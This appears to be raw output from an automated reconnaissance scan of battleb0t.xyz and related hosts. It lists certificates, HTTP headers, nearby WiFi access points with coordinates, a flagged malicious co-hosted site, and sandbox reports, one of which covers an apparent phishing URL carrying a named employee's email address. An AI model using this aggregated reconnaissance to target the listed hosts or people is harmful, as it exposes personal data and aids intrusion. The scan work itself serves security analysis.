Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | " (Cloaked) (Net ID: 00:01:36:59:CB:CF) | 37.7813933,-122.3918002 |
| 2023-05-12 02:59:55 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | robert.scheubeck@vitesco.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fvitesco.com%2Frobert.scheubeck%40vitesco.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_86c_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_86c_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_86c_IE_EarlyTabStart_0xb4c_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_86c_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2156"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_86c_ConnHashTable<2156>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_86c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', 
u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "172.66.40.106:443"\n "185.88.152.184:443"\n "35.186.254.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "rabetsanatkoosha.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fvitesco.com%2Frobert.scheubeck%40vitesco.com" as clean (type is "HTML document ASCII text")\n Antivirus vendors marked dropped file "TarC7FB.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC87A.tmp" as clean (type is "data")'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on process "00000000-00003280"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, 
u'type': 8, u'description': u'"CabC879.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabC7EA.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fvitesco.com%2Frobert.scheubeck%40vitesco.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "_1281DC16-BCE6-11ED-A5CB-080027ACDD18_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003364]\n "RecoveryStore._62E344AD-BCE5-11ED-A5CB-080027ACDD18_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "9L52N55G.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9L52N55G.txt]- [targetUID: 00000000-00002156]\n "ISM1RHVV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ISM1RHVV.txt]- [targetUID: 00000000-00003364]\n "1Y9ROK9B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1Y9ROK9B.txt]- [targetUID: 00000000-00002156]\n 
"search_2_.json" has type "JSON data"- [targetUID: N/A]\n "0JE7DDOB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0JE7DDOB.txt]- [targetUID: 00000000-00002156]\n "DE9QSFBN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DE9QSFBN.txt]- [targetUID: 00000000-00002156]\n "59XOOQKO.htm" has type "HTML document ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\59XOOQKO.htm]- [targetUID: 00000000-00003364]\n "QJEP1X8E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QJEP1X8E.txt]- [targetUID: 00000000-00002156]\n "_62E344AF-BCE5-11ED-A5CB-080027ACDD18_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "~DFEC7BEACF44F2BD56.TMP" has type "data"- Location: [%TEMP%\\~DFEC7BEACF44F2BD56.TMP]- [targetUID: 00000000-00002156]\n "CabC879.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabC879.tmp]- [targetUID: 00000000-00003364]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003364]'}, {u'category': u'Environment Awareness', u'origin': u'File/Memory', u'identifier': u'string-167', u'name': u'Contains ability to retrieve the contents of the STARTUPINFO structure (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543', 
u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed API string:"GetStartupInfo" [Source: 00000000-00003280.00000000.65937.003B1000.00000020.mdmp\n 00000000-00003280.00000000.65970.003B1000.00000020.mdmp]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'[undecodable binary payload omitted] |
| 2023-05-12 02:55:43 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | {u'count': 1, u'search_terms': [{u'id': u'host', u'value': u'64.226.81.43'}], u'result': [{u'environment_id': 160, u'job_id': u'6421d18abc9d17a8490ac78d', u'analysis_start_time': u'2023-03-27 17:25:30', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no verdict', u'submit_name': u'sample.url', u'sha256': u'4feea01ff4a783ce1c5865f5114d6f2620c834d630588769904d9a0871e30a8d', u'type': None, u'type_short': u'url', u'size': 53}]} | 64.226.81.43 |
| 2023-05-12 02:55:15 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]} | 165.232.113.85 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | dmhs (Net ID: 00:02:2D:0B:16:21) | 34.0544, -118.244 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.16): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:35:13 | Malicious Co-Hosted Site | Yes | Comodo | 0 | 0 | 3 | 0 | None | Blocked by Comodo DNS [rathook.cc] | rathook.cc |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00jew.github.io | 185.199.111.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | eLektriK (Net ID: 00:08:5C:7B:B9:3D) | 40.2024, 29.0398 |
| 2023-05-12 02:44:19 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | pics.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'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', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': 
u'[base64 certificate omitted]', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256':
u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'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', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Bandlab (Category: music)
https://www.bandlab.com/Altpapier | Altpapier |
| 2023-05-12 02:53:39 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["9954:9C3B:20A7B64:2F7931C:645C5074"], "Age": ["259"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache_Hits": ["1"], "X_Timer": ["S1683771768.574276,VS0,VE2"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["8a09b57cb5993eaa6860d607d298dd9826aef348"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["HIT"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-chi-klot8100161-CHI"], "Accept_Ranges": ["bytes"]} | 185.199.108.153 |
| 2023-05-12 02:54:17 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 2606:4700:3037::6815:470e |
| 2023-05-12 02:48:56 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://financialcafe.net/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_cc0_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_cc0_IESQMMUTEX_0_519"\n "IsoScope_cc0_IESQMMUTEX_0_303"\n "IsoScope_cc0_ConnHashTable<3264>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_cc0_IESQMMUTEX_0_331"\n "IsoScope_cc0_IE_EarlyTabStart_0xdc4_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3264"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"52.24.76.118:443"\n "172.64.132.15:443"\n "104.16.87.20:443"\n 
"142.250.189.232:443"\n "65.8.158.69:443"\n "104.17.25.14:443"\n "185.199.110.153:443"\n "142.250.189.234:443"\n "142.250.191.67:443"\n "142.250.189.174:443"\n "184.27.80.18:443"\n "20.25.53.147:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2021 Twitter, Inc." (Indicator: "twitter")\n "transportUrl:b,context:c},J(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+ke.ca+"&cx=c";Io()&&(f+="&sign="+ke.Td);var g=te||ve?Ho(b,f):void 0;g||(g=rl("https://","http://",ke.jd+f));di().destination[a]={state:1,context:c};Hb(g)}};function Jo(){if(Zh()){return!0}return!1};var Mo=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),No={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Oo={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, 
u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFF3A.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFD53.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabFF39.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabFF39.tmp]- [targetUID: 00000000-00003376]\n "CabFD52.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabFD52.tmp]- [targetUID: 00000000-00003376]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003376]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "FinancialCafeBlack-06_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "FinancialCafeWhite-07_1_.svg" has type "SVG Scalable Vector 
Graphics image"- [targetUID: N/A]\n "imgggnew_1_.png" has type "PNG image data 1920 x 1699 8-bit colormap non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003376]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "profiles_1_.png" has type "PNG image data 136 x 135 4-bit colormap non-interlaced"- [targetUID: N/A]\n "SSL-Certified-icons_1_.png" has type "PNG image data 131 x 50 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "TarFF3A.tmp" has type "data"- Location: [%TEMP%\\TarFF3A.tmp]- [targetUID: 00000000-00003376]\n "6IILQXTA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6IILQXTA.txt]- [targetUID: 00000000-00003376]\n "pxiByp8kv8JHgFVrLDD4V1g_1_.woff" has type "Web Open Font Format TrueType length 65344 version 1.1"- [targetUID: N/A]\n "js_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "FRC8Z6SG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FRC8Z6SG.txt]- [targetUID: 00000000-00003264]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._FED39B3D-CE42-11ED-A569-08002791028F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "wallet_1_.png" has type "PNG image data 137 x 137 4-bit colormap non-interlaced"- [targetUID: N/A]\n "~DFBCF09A62309EF55B.TMP" has type "data"- Location: [%TEMP%\\~DFBCF09A62309EF55B.TMP]- [targetUID: 00000000-00003264]\n "iframeResizerDestination.min_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "TarFD53.tmp" has type "data"- Location: 
[%TEMP%\\TarFD53.tmp]- [targetUID: 00000000-00003376]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "jquery.org/license"\n Pattern match: "https://+c"\n Pattern match: "https://stats.g.doubleclick.net/j/collect"\n Pattern match: "https://ampcid.google.com/v1/publisher:getClientId"\n Pattern match: "https://cct.google/taggy/agent.js"\n Heuristic match: "* Copyright: (c) 2018 David J. Bradshaw - dave@bradshaw.net"\n Pattern match: "https://getbootstrap.com/"\n Pattern match: "https://github.com/twbs/bootstrap/graphs/contributors"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license"\n Pattern match: "https://github.com/twbs/bootstrap/blob/main/LICENSE"\n Pattern match: "www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "https://fonts.googleapis.com/css2?family=Montserrat:wght@400;600;800&display=swap"\n Pattern match: "C.JgU/0$"\n Pattern match: "p6gu.gqN/\ufffd\ufffdm\ufffd/\u0225\ufffdy\ufffd]\ufffd\ufffd#\ufffd\ufffd\ufffd\ufffdh\ufffd\ufffd\ufffd\ufffd\u070f\ufffd\ufffdZ\ufffd*~\ufffd$O\ufffd\ufffd\ufffdA\ufffdd\ufffd7\ufffdH2oc\ufffd.v\ufffd\ufffdY#8i&2v\ufffd"\n Pattern match: "https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;800&display=swap"\n Pattern match: "MUID30D366FDCBF662572726741ECA726330msn.com/102513402695683110216750963867231023696*"\n Pattern match: ".2.733600913.1680102288financialcafe.net/1088321153638431170546345636378031023695*"\n Pattern match: 
".2.733600913.1680102288financialcafe.net/1088321153638431170546345636378031023695*_gidGA1.2.1308012239.1680102288financialcafe.net/1088416549478431023896345636378031023695*"\n Pattern match: "https://www.google.com/ads/ga-audiences,a.google,c"\n Pattern match: "https://stats.g.doubleclick.net/j/collect,ca.U,ca"\n Pattern match: "https://www.google-analytics.com/analytics.js,k=c.F?rp(R(c,gaFunctionName)):rp();if(pa(k)){var"\n Pattern match: "www.google-analytics.com==a.host&& | 185.199.110.153 |
| 2023-05-12 02:50:26 | Physical Address | No | GLEIF | 2 | 0 | 3 | 0 | None | 101 Townsend Street, San Francisco, US-CA, US, 94107 | Cloudflare, Inc. |
| 2023-05-12 02:54:17 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://nwapi.battleb0t.xyz | nwapi.battleb0t.xyz |
| 2023-05-12 03:00:25 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-128@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": 